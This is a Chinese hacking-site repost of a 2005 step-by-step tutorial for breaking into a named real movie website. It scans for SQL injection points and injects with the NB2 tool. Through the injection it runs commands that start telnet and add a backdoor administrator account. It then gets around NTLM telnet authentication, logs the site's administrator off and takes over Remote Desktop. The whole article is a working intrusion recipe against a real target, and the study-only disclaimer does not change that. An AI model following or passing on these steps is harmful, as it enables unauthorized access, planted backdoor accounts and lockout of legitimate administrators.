欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

利用注入漏洞获得密码

来源:转载 作者:佚名 时间:2005-12-23 TAG: 我要投稿
 

操作过程
1,查找一个电影网站。
http://www.22see.com/

2,利用ascscan查找网页可以利用的注入点。

3,使用NB2注入工具进行注入

4,使用ping命令得到www.22see.com的ip地址

5,使用端口扫描器扫描ip开放的端口。发现开放
3389,对方管理员看来安全意识很差。使用终端服务却不修改默认3389端口。

6,使用nb2的sql工具。远程执行dos命令

net start telnet                                       开telnet服务

net user mint mint /add                                添加用户mint密码为mint

net localgroup administrators mint /add                将帐号mint升级为管理员

7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。

9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

11,修改cmd的快捷方式属性为允许其他身份登陆。

12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

13,telnet对方ip.直接可以登陆对方电脑了。
使用命令
c:\query user                  查看对方目前终端登陆状况。

运行命令
c:\logoff 1                     踢出去一个管理者

再用c:\query user检查一便~~
ok了

14,使用3389远程终端登陆。

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载